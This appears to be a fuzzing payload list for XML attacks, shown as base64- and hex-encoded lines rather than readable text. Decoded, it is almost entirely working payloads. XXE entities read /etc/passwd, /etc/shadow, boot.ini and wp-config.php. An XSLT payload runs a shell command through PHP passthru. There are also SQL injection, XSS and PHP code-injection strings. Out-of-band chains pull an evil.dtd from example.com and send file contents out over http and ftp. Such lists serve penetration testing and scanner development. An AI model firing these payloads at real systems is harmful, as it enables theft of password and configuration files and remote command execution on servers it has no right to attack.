PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZID48IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9zaGFkb3ciID5dPjxmb28+Jnh4ZTs8L2Zvbz4= 82 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZID48IUVOVElUWSB4eGUgU1lTVEVNICJodHRwOi8vZXhhbXBsZS5jb206ODAiID5dPjxmb28+Jnh4ZTs8L2Zvbz4= 83 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZID48IUVOVElUWSB4eGUgU1lTVEVNICJodHRwOi8vZXhhbXBsZTo0NDMiID5dPg== 84 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZPjwhRU5USVRZIHhlZSBTWVNURU0gImZpbGU6Ly8vZGV2L3JhbmRvbSI+XT48Zm9vPiZ4ZWU7PC9mb28+ 85 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZPjwhRU5USVRZIHhlZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCI+XT48Zm9vPiZ4ZWU7PC9mb28+ 86 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZPjwhRU5USVRZIHhlZSBTWVNURU0gImZpbGU6Ly8vZXRjL3NoYWRvdyI+XT48Zm9vPiZ4ZWU7PC9mb28+ 87 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZPjwhRU5USVRZIHhlZSBTWVNURU0gImZpbGU6Ly9jOi9ib290LmluaSI+XT48Zm9vPiZ4ZWU7PC9mb28+ 88 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZPjwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vL2Rldi9yYW5kb20iPl0+PGZvbz4meHhlOzwvZm9vPg== 89 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZPjwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vL2V0Yy9wYXNzd2QiPl0+PGZvbz4meHhlOzwvZm9vPg== 90 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZPjwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vL2V0Yy9zaGFkb3ciPl0+PGZvbz4meHhlOzwvZm9vPg== 91 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZPjwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly9jOi9ib290LmluaSI+XT48Zm9vPiZ4eGU7PC9mb28+ 92 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZPjwhRU5USVRZIHh4ZSBTWVNURU0gImh0dHA6Ly9zbjFwZXJzZWN1cml0eS5jb20vLnRlc3RpbmcvcmZpX3Z1bG4udHh0Ij5dPjxmb28+Jnh4ZTs8L2Zvbz4= 93 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZPjwhRU5USVRZIHh4ZSBTWVNURU0gImh0dHA6Ly94ZXJvc2VjdXJpdHkuY29tLy50ZXN0aW5nL3JmaV92dWxuLnR4dCI+XT48Zm9vPiZ4eGU7PC9mb28+ 94 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZPjwhRU5USVRZIHh4ZSBTWVNURU0gImh0dHBzOi8vY3Jvd2RzaGllbGQuY29tLy50ZXN0aW5nL3JmaV92dWxuLnR4dCI+XT48Zm9vPiZ4eGU7PC9mb28+ 95 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSB4eGUgWzwhRU5USVRZIGZvbyAiYWFhYWFhIj5dPg== 96 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSB4eGUgWzwhRU5USVRZIGZvbyAiYWFhYWFhIj5dPjxyb290PiZmb287PC9yb290Pg== 97 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/Pjxmb28+PCFbQ0RBVEFbJyBvciAxPTEgb3IgJyc9J11dPjwvZm9vPg== 98 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/Pjxmb28+PCFbQ0RBVEFbJyBvciAxPTEgb3IgJyc9J11dPjwvZm9vZj4= 99 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/Pjxmb28+PCFbQ0RBVEFbPF1dPlNDUklQVDwhW0NEQVRBWz5dXT5hbGVydCgnWFNTJyk7PCFbQ0RBVEFbPF1dPi9TQ1JJUFQ8IVtDREFUQVs+XV0+PC9mb28+ 100 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/Pjxmb28+PCFbQ0RBVEFbPF1dPlNDUklQVDwhW0NEQVRBWz5dXT5hbGVydCgnZ290Y2hhJyk7PCFbQ0RBVEFbPF1dPi9TQ1JJUFQ8IVtDREFUQVs+XV0+PC9mb28+ 101 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/Pjx0ZXN0PjwvdGVzdD4= 102 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTE2IiBzdGFuZGFsb25lPSJ5ZXMiPz48bWV0aG9kQ2FsbD48bWV0aG9kTmFtZT5waW5nYmFjay5waW5nPC9tZXRob2ROYW1lPjxwYXJhbXM+PHBhcmFtPjx2YWx1ZT48c3RyaW5nPmh0dHBzOi8vd29yZHByZXNzLm9yZy88L3N0cmluZz48L3ZhbHVlPjwvcGFyYW0+PHBhcmFtPjx2YWx1ZT48c3RyaW5nPmh0dHA6Ly9zbjFwZXJzZWN1cml0eS5jb208L3N0cmluZz48L3ZhbHVlPjwvcGFyYW0+PC9wYXJhbXM+PC9tZXRob2RDYWxsPg== 103 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTE2IiBzdGFuZGFsb25lPSJ5ZXMiPz48bWV0aG9kQ2FsbD48bWV0aG9kTmFtZT5waW5nYmFjay5waW5nPC9tZXRob2ROYW1lPjxwYXJhbXM+PHBhcmFtPjx2YWx1ZT48c3RyaW5nPmh0dHBzOi8vd29yZHByZXNzLm9yZy88L3N0cmluZz48L3ZhbHVlPjwvcGFyYW0+PHBhcmFtPjx2YWx1ZT48c3RyaW5nPmh0dHA6Ly94ZXJvc2VjdXJpdHkuY29tPC9zdHJpbmc+PC92YWx1ZT48L3BhcmFtPjwvcGFyYW1zPjwvbWV0aG9kQ2FsbD4= 104 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48IURPQ1RZUEUgZG9jIFs8IUVMRU1FTlQgdGVzdCBBTlkgPjwhRU5USVRZIHh4ZSBTWVNURU0gInBocDovL2ZpbHRlci9yZWFkLWNvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT1maWxlOi8vL0M6L2Jvb3QuaW5pIiA+XT48ZG9jPjx0ZXN0PkNvbnRlbnRzIG9mIGZpbGU6ICZ4eGU7PC90ZXN0PjwvZG9jPg== 105 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48IURPQ1RZUEUgZG9jIFs8IUVMRU1FTlQgdGVzdCBBTlkgPjwhRU5USVRZIHh4ZSBTWVNURU0gInBocDovL2ZpbHRlci9yZWFkLWNvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT1maWxlOi8vL0M6L2h0ZG9jcy93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCIgPl0+PGRvYz48dGVzdD5Db250ZW50cyBvZiBmaWxlOiAmeHhlOzwvdGVzdD48L2RvYz4= 106 | PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJ5ZXMiPz48IURPQ1RZUEUgZXJudyBbIDwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgPiBdPjxzdmcgd2lkdGg9IjUwMHB4IiBoZWlnaHQ9IjEwMHB4IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjEiPjx0ZXh0IGZvbnQtZmFtaWx5PSJWZXJkYW5hIiBmb250LXNpemU9IjE2IiB4PSIxMCIgeT0iNDAiPiZ4eGU7PC90ZXh0Pjwvc3ZnPg== 107 | PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJ5ZXMiPz48IURPQ1RZUEUgZXJudyBbIDwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgPiBdPjxzdmcgd2lkdGg9IjUwMHB4IiBoZWlnaHQ9IjQwcHgiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHZlcnNpb249IjEuMSI+Jnh4ZTs8L3N2Zz4= 108 | PD94bWwgdmVyc2lvbj0iMS4wIj8+IDwhRE9DVFlQRSBjaGFuZ2UtbG9nIFsgPCFFTlRJVFkgc3lzdGVtRW50aXR5IFNZU1RFTSAiLi4vLi4vLi4vLi4vYm9vdC5pbmkiPiBdPiA8Y2hhbmdlLWxvZz4gPHRleHQ+JnN5c3RlbUVudGl0eTs8L3RleHQ+IDwvY2hhbmdlLWxvZz4= 109 | PD94bWwgdmVyc2lvbj0iMS4wIj8+IDwhRE9DVFlQRSBjaGFuZ2UtbG9nIFsgPCFFTlRJVFkgc3lzdGVtRW50aXR5IFNZU1RFTSAiLi4vLi4vLi4vYm9vdC5pbmkiIF0+IDxjaGFuZ2UtbG9nPiA8dGV4dD4mc3lzdGVtRW50aXR5OzwvdGV4dD47IDwvY2hhbmdlLWxvZz4= 110 | PD94bWwgdmVyc2lvbj0iMS4wIj8+IDwhRE9DVFlQRSBjaGFuZ2UtbG9nIFsgPCFFTlRJVFkgc3lzdGVtRW50aXR5IFNZU1RFTSAicm9ib3RzLnR4dCI+IF0+IDxjaGFuZ2UtbG9nPiA8dGV4dD4mc3lzdGVtRW50aXR5OzwvdGV4dD4gPC9jaGFuZ2UtbG9nPg== 111 | PD94bWwgdmVyc2lvbj0iMS4wIj8+IDwhRE9DVFlQRSBjaGFuZ2UtbG9nIFsgPCFFTlRJVFkgc3lzdGVtRW50aXR5IFNZU1RFTSAicm9ib3RzLnR4dCI+IF0+IDxjaGFuZ2UtbG9nPiA8dGV4dD4mc3lzdGVtRW50aXR5OzwvdGV4dD47IDwvY2hhbmdlLWxvZz4= 112 | PD94bWwgdmVyc2lvbj0iMS4wIj8+PCFET0NUWVBFIGNoYW5nZS1sb2dbIDwhRU5USVRZIG15RW50aXR5ICJXb3JsZCI+IF0+PGNoYW5nZS1sb2c+PHRleHQ+SGVsbG8gJm15RW50aXR5OzwvdGV4dD48L2NoYW5nZS1sb2c+ 113 | PD94bWwgdmVyc2lvbj0iMS4wIj8+PCFET0NUWVBFIGNoYW5nZS1sb2dbIDwhRU5USVRZIG15RW50aXR5ICJXb3JsZCI+PCFFTlRJVFkgbXlRdW90ZSAiJnF1b3Q7Ij4gXT48Y2hhbmdlLWxvZz48dGV4dD4mbXlRdW90ZTtIZWxsbyAmbXlFbnRpdHk7Jm15UXVvdGU7PC90ZXh0PjwvY2hhbmdlLWxvZz4= 114 | PD94bWwgdmVyc2lvbj0iMS4wIj8+PGNoYW5nZS1sb2c+PHRleHQ+JnF1b3Q7SGVsbG8gV29ybGQmcXVvdDs8L3RleHQ+PC9jaGFuZ2UtbG9nPg== 115 | PD94bWwgdmVyc2lvbj0iMS4wIj8+PGNoYW5nZS1sb2c+PHRleHQ+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PjwvdGV4dD48L2NoYW5nZS1sb2c+ 116 | PD94bWwgdmVyc2lvbj0iMS4wIj8+PGNoYW5nZS1sb2c+PHRleHQ+SGVsbG8gV29ybGQ8L3RleHQ+PC9jaGFuZ2UtbG9nPg== 117 | PD94bWwgdmVyc2lvbj0iMS4wIj8+PG1ldGhvZENhbGw+PG1ldGhvZE5hbWU+ZGVtby5zYXlIZWxsbzwvbWV0aG9kTmFtZT48cGFyYW1zPjwvcGFyYW1zPjwvbWV0aG9kQ2FsbD4= 118 | PD94bWwgdmVyc2lvbj0nMS4wJyBzdGFuZGFsb25lPSdubyc/PjwhRE9DVFlQRSBmb28gWzwhRU5USVRZICUgZjVhMzAgU1lTVEVNICJodHRwczovL2Nyb3dkc2hpZWxkLmNvbS8udGVzdGluZy9yZmlfdnVsbi50eHQiPiVmNWEzMDsgXT4= 119 | PEhUTUwgeG1sbnM6eHNzPjw/aW1wb3J0IG5hbWVzcGFjZT0ieHNzIiBpbXBsZW1lbnRhdGlvbj0iaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuaHRjIj4= 120 | PEhUTUwgeG1sbnM6eHNzPjw/aW1wb3J0IG5hbWVzcGFjZT0ieHNzIiBpbXBsZW1lbnRhdGlvbj0iaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuaHRjIj48eHNzOnhzcz5YU1M8L3hzczp4c3M+PC9IVE1MPg== 121 | PEhUTUwgeG1sbnM6eHNzPjw/aW1wb3J0IG5hbWVzcGFjZT0ieHNzIiBpbXBsZW1lbnRhdGlvbj0iaHR0cHM6Ly9jcm93ZHNoaWVsZC5jb20vLnRlc3RpbmcveHNzLmh0bWwiPjx4c3M6eHNzPlhTUzwveHNzOnhzcz48L0hUTUw+ 122 | PFNQQU4gREFUQVNSQz0jSSBEQVRBRkxEPUMgREFUQUZPUk1BVEFTPUhUTUw+PC9TUEFOPg== 123 | PGNoYW5nZS1sb2c+IDx0ZXh0PiZzeXN0ZW1FbnRpdHk7PC90ZXh0PiA8L2NoYW5nZS1sb2c+ 124 | PGZvbz48IVtDREFUQVsnIG9yIDE9MSBvciAnJz0nXV0+PC9mb28+ 125 | PGZvbz48IVtDREFUQVs8XV0+U0NSSVBUPCFbQ0RBVEFbPl1dPmFsZXJ0KCdYU1MnKTs8IVtDREFUQVs8XV0+L1NDUklQVDwhW0NEQVRBWz5dXT48L2Zvbz4= 126 | PG5hbWU+JywnJykpOyBwaHBpbmZvKCk7IGV4aXQ7Lyo8L25hbWU+ 127 | PHNvYXA6Qm9keT48Zm9vPjwhW0NEQVRBWzwhRE9DVFlQRSBkb2MgWzwhRU5USVRZICUgZHRkIFNZU1RFTSAiaHR0cDovL3gueC54Lng6MjIvIj4gJWR0ZDtdPjx4eHgvPl1dPjwvZm9vPjwvc29hcDpCb2R5Pg== 128 | PHRlc3Q+ICRsRE9NRG9jdW1lbnQtPnRleHRDb250ZW50PTwhW0NEQVRBWzxdXT5zY3JpcHQ8IVtDREFUQVs+XV0+YWxlcnQoJ1hTUycpPCFbQ0RBVEFbPF1dPi9zY3JpcHQ8IVtDREFUQVs+XV0+IDwvdGVzdD4= 129 | PHRlc3Q+PC90ZXN0Pg== 130 | PHhtbCBJRD0ieHNzIj48ST48Qj4mbHQ7SU1HIFNSQz0iamF2YXM8IS0tIC0tPmNyaXB0OmFsZXJ0KCdYU1MnKSImZ3Q7PC9CPjwvST48L3htbD48U1BBTiBEQVRBU1JDPSIjeHNzIiBEQVRBRkxEPSJCIiBEQVRBRk9STUFUQVM9IkhUTUwiPjwvU1BBTj48L0M+PC9YPjwveG1sPjxTUEFOIERBVEFTUkM9I0kgREFUQUZMRD1DIERBVEFGT1JNQVRBUz1IVE1MPjwvU1BBTj4= 131 | PHhtbCBJRD0ieHNzIj48ST48Qj48SU1HIFNSQz0iamF2YXM8IS0tIC0tPmNyaXB0OmFsZXJ0KCdYU1MnKSI+PC9CPjwvST48L3htbD48U1BBTiBEQVRBU1JDPSIjeHNzIiBEQVRBRkxEPSJCIiBEQVRBRk9STUFUQVM9IkhUTUwiPjwvU1BBTj48L0M+PC9YPjwveG1sPjxTUEFOIERBVEFTUkM9I0kgREFUQUZMRD1DIERBVEFGT1JNQVRBUz1IVE1MPjwvU1BBTj4= 132 | PHhtbCBJRD0ieHNzIj48ST48Qj48SU1HIFNSQz0iamF2YXM8IS0tIC0tPmNyaXB0OmFsZXJ0KCdYU1MnKSI+PC9CPjwvST48L3htbD48U1BBTiBEQVRBU1JDPSIjeHNzIiBEQVRBRkxEPSJCIiBEQVRBRk9STUFUQVM9IkhUTUwiPjwvU1BBTj48L0M+PC9YPjwveG1sPjxTUEFOIERBVEFTUkM9I0kgREFUQUZMRD1DIERBVEFGT1JNQVRBUz1IVE1MPjwvU1BBTj4i 133 | PHhtbCBJRD1JPjxYPjxDPjwhW0NEQVRBWzxJTUcgU1JDPSJqYXZhc11dPjwhW0NEQVRBW2NyaXB0OmFsZXJ0KCdYU1MnKTsiPl1dPg== 134 | PHhtbCBJRD1JPjxYPjxDPjwhW0NEQVRBWzxJTUcgU1JDPSJqYXZhc11dPjwhW0NEQVRBW2NyaXB0OmFsZXJ0KCdYU1MnKTsiPl1dPiI= 135 | PHhtbCBTUkM9Imh0dHBzOi8vY3Jvd2RzaGllbGQuY29tLy50ZXN0aW5nL3JmaV92dWxuLnR4dCIgSUQ9ST48L3htbD48U1BBTiBEQVRBU1JDPSNJIERBVEFGTEQ9QyBEQVRBRk9STUFUQVM9SFRNTD48L1NQQU4+Ig== 136 | PHhtbCBTUkM9Imh0dHBzOi8vY3Jvd2RzaGllbGQuY29tLy50ZXN0aW5nL3hzcy5odG1sIiBJRD1JPjwveG1sPjxTUEFOIERBVEFTUkM9I0kgREFUQUZMRD1DIERBVEFGT1JNQVRBUz1IVE1MPjwvU1BBTj4= 137 | PHhtbCBTUkM9Inhzc3Rlc3QueG1sIiBJRD1JPjwveG1sPg== 138 | PHhtbCBTUkM9Inhzc3Rlc3QueG1sIiBJRD1JPjwveG1sPjxTUEFOIERBVEFTUkM9I0kgREFUQUZMRD1DIERBVEFGT1JNQVRBUz1IVE1MPjwvU1BBTj4= 139 | PHhtbCB2ZXJzaW9uPSIxLjAiPz48IURPQ1RZUEUgWFhFIFs8IUVMRU1FTlQgbWV0aG9kTmFtZSBBTlkgPjwhRU5USVRZIHh4ZSBTWVNURU0gIi4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiPl0+PG1ldGhvZENhbGw+PG1ldGhvZE5hbWU+Jnh4ZTwvbWV0aG9kTmFtZT48L21ldGhvZENhbGw+ 140 | PHhtbCB2ZXJzaW9uPSIxLjAiPz48IURPQ1RZUEUgWFhFIFs8IUVMRU1FTlQgbWV0aG9kTmFtZSBBTlkgPjwhRU5USVRZIHh4ZSBTWVNURU0gImh0dHA6Ly9zbjFwZXJzZWN1cml0eS5jb20vLnRlc3RpbmcvcmZpX3Z1bG4udHh0Ij5dPjxtZXRob2RDYWxsPjxtZXRob2ROYW1lPiZ4eGU8L21ldGhvZE5hbWU+PC9tZXRob2RDYWxsPg== 141 | PHhtbCB2ZXJzaW9uPSIxLjAiPz48IURPQ1RZUEUgWFhFIFs8IUVMRU1FTlQgbWV0aG9kTmFtZSBBTlkgPjwhRU5USVRZIHh4ZSBTWVNURU0gImh0dHA6Ly94ZXJvc2VjdXJpdHkuY29tLy50ZXN0aW5nL3JmaV92dWxuLnR4dCI+XT48bWV0aG9kQ2FsbD48bWV0aG9kTmFtZT4meHhlPC9tZXRob2ROYW1lPjwvbWV0aG9kQ2FsbD4= 142 | PHhtbCB2ZXJzaW9uPSIxLjAiPz48IURPQ1RZUEUgWFhFIFs8IUVMRU1FTlQgbWV0aG9kTmFtZSBBTlkgPjwhRU5USVRZIHh4ZSBTWVNURU0gImh0dHBzOi8vY3Jvd2RzaGllbGQuY29tLy50ZXN0aW5nL3JmaV92dWxuLnR4dCI+XT48bWV0aG9kQ2FsbD48bWV0aG9kTmFtZT4meHhlPC9tZXRob2ROYW1lPjwvbWV0aG9kQ2FsbD4= 143 | PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnBocD0iaHR0cDovL3BocC5uZXQveHNsIj48eHNsOnRlbXBsYXRlIG1hdGNoPSIvIj48c2NyaXB0PmFsZXJ0KDEyMyk8L3NjcmlwdD48L3hzbDp0ZW1wbGF0ZT48L3hzbDpzdHlsZXNoZWV0Pg== 144 | PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnBocD0iaHR0cDovL3BocC5uZXQveHNsIj48eHNsOnRlbXBsYXRlIG1hdGNoPSIvIj48eHNsOmNvcHktb2Ygc2VsZWN0PSJkb2N1bWVudCgnL2V0Yy9wYXNzd2QnKSIvPjwveHNsOnRlbXBsYXRlPjwveHNsOnN0eWxlc2hlZXQ+ 145 | PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnBocD0iaHR0cDovL3BocC5uZXQveHNsIj48eHNsOnRlbXBsYXRlIG1hdGNoPSIvIj48eHNsOnZhbHVlLW9mIHNlbGVjdD0icGhwOmZ1bmN0aW9uKCdwYXNzdGhydScsJ2xzIC1sYScpIi8+PC94c2w6dGVtcGxhdGU+PC94c2w6c3R5bGVzaGVldD4= 146 | QA== 147 | QCo= 148 | W1Rubjk2XQ== 149 | XT4= 150 | Y291bnQoL2NoaWxkOjpub2RlKCkp 151 | ZmFsc2U= 152 | bnVsbA== 153 | dHJ1ZQ== 154 | eCcgb3IgMT0xIG9yICd4Jz0neQ== 155 | eCcgb3IgbmFtZSgpPSd1c2VybmFtZScgb3IgJ3gnPSd5 156 | ez0gVG5uOTZ9 157 | e1Rubjk2fQ== 158 | e3s9IFRubjk2fX0= 159 | e3tUbm45Nn19 160 | fX08L3NjcmlwdD4iIici 161 | fX08L3NjcmlwdD4n 162 | fX08L3NjcmlwdD4nIg== 163 | fX08L3NjcmlwdD48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0PjwvYm9keT48L2h0bWw+PCEtLQ== 164 | 4oCY 165 | 4oCc 166 | -------------------------------------------------------------------------------- /XXE/hex_encoded.txt: -------------------------------------------------------------------------------- 1 | 223c48544d4c20786d6c6e733a7873733e3c3f696d706f7274206e616d6573706163653d2222787373222220696d706c656d656e746174696f6e3d2222687474703a2f2f68612e636b6572732e6f72672f7873732e68746322223e3c7873733a7873733e5853533c2f7873733a7873733e3c2f48544d4c3e220a 2 | 223c786d6c2049443d222278737322223e3c493e3c423e3c494d47205352433d22226a617661733c212d2d202d2d3e63726970743a616c6572742827585353272922223e3c2f423e3c2f493e3c2f786d6c3e3c5350414e20444154415352433d22222378737322222044415441464c443d22224222222044415441464f524d415441533d222248544d4c22223e3c2f5350414e3e3c2f433e3c2f583e3c2f786d6c3e3c5350414e20444154415352433d23492044415441464c443d432044415441464f524d415441533d48544d4c3e3c2f5350414e3e220a 3 | 223c786d6c2049443d493e3c583e3c433e3c215b43444154415b3c494d47205352433d22226a617661735d5d3e3c215b43444154415b63726970743a616c657274282758535327293b22223e5d5d3e220a 4 | 223c786d6c205352433d2222787373746573742e786d6c22222049443d493e3c2f786d6c3e3c5350414e20444154415352433d23492044415441464c443d432044415441464f524d415441533d48544d4c3e3c2f5350414e3e220a 5 | 227d7d3c2f7363726970743e270a 6 | 227d7d3c2f7363726970743e3c7363726970743e616c6572742831293b3c2f7363726970743e3c2f626f64793e3c2f68746d6c3e3c212d2d0a 7 | 232320416674657220584d4c204465636c61726174696f6e0a 8 | 232320456c656d656e7420616e64204174747269622056616c7565730a 9 | 240a 10 | 250a 11 | 25666f6f3b0a 12 | 2661706f733b586f695a520a 13 | 26666f6f3b0a 14 | 266c743b2520546e6e393620252667743b0a 15 | 266c743b253d20546e6e393620252667743b0a 16 | 266c743b3f20546e6e3936203f2667743b0a 17 | 266c743b3f546e6e3936203f2667743b0a 18 | 266c743b546e6e39362667743b0a 19 | 2671756f743b586f695a520a 20 | 27206f722027273d270a 21 | 27206f72202731273d27310a 22 | 277d7d3c2f7363726970743e220a 23 | 277d7d3c2f7363726970743e270a 24 | 28546e6e3936290a 25 | 2a0a 26 | 2a2f2a0a 27 | 2b0a 28 | 2d0a 29 | 2d310a 30 | 2f0a 31 | 2f2f0a 32 | 2f2f2a0a 33 | 300a 34 | 302e30303030350a 35 | 302e310a 36 | 302e390a 37 | 310a 38 | 312e37393736393331333438363233313537652b3330380a 39 | 35652d31300a 40 | 35652d3332340a 41 | 3a0a 42 | 3b0a 43 | 3c21444f4354595045206175746f66696c6c75706c6f6164205b3c21454e544954592039655456432053595354454d202266696c653a2f2f2f6574632f706173737764223e0a 44 | 3c21444f4354595045206175746f66696c6c75706c6f6164205b3c21454e54495459204437314d6e2053595354454d202266696c653a2f2f2f633a2f626f6f742e696e69223e0a 45 | 3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d202266696c653a2f2f2f633a2f626f6f742e696e6922203e5d3e0a 46 | 3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f70617373776422203e5d3e0a 47 | 3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f736861646f7722203e5d3e0a 48 | 3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d2022687474703a2f2f6578616d706c652e636f6d2f746578742e74787422203e5d3e0a 49 | 3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e593e3c21454e54495459207878652053595354454d202266696c653a2f2f2f2f6465762f72616e646f6d223e5d3e0a 50 | 3c21444f435459504520666f6f205b3c21454e544954592078786534363437312053595354454d2022687474703a2f2f63726f7764736869656c642e636f6d2f2e74657374696e672f7266695f76756c6e2e747874223e205d3e0a 51 | 3c21444f435459504520666f6f205b3c21454e544954592078786537656239372053595354454d202266696c653a2f2f2f633a2f626f6f742e696e69223e205d3e0a 52 | 3c21444f435459504520666f6f205b3c21454e544954592078786537656239372053595354454d202266696c653a2f2f2f6574632f706173737764223e205d3e0a 53 | 3c21444f435459504520787865205b203c21454e5449545920252066696c652053595354454d202266696c653a2f2f2f633a2f626f6f742e696e69223e3c21454e544954592025206474642053595354454d2022687474703a2f2f6578616d706c652e636f6d2f6576696c2e647464223e256474643b25747269636b3b5d3e0a 54 | 3c21444f435459504520787865205b203c21454e5449545920252066696c652053595354454d202266696c653a2f2f2f6574632f6973737565223e3c21454e544954592025206474642053595354454d2022687474703a2f2f6578616d706c652e636f6d2f6576696c2e647464223e256474643b25747269636b3b5d3e0a 55 | 3c21444f435459504520787865205b3c21454e5449545920666f6f2022616161616161223e5d3e0a 56 | 3c21444f435459504520787865205b3c21454e5449545920666f6f2022616161616161223e5d3e3c726f6f743e26666f6f3b3c2f726f6f743e0a 57 | 3c21454e54495459202520696e7420223c21454e5449545920262333373b20747269636b2053595354454d2027687474703a2f2f3132372e302e302e313a38302f3f2566696c653b273e2020223e2025696e743b0a 58 | 3c21454e54495459202520696e7420223c21454e5449545920262333373b20747269636b2053595354454d2027687474703a2f2f3132372e302e302e313a38302f3f2566696c653b273ec2a020223e2025696e743b0a 59 | 3c21454e54495459202520706172616d3320223c21454e544954592026237832353b20657866696c2053595354454d20276674703a2f2f3132372e302e302e313a32312f2564617461333b273e223e0a 60 | 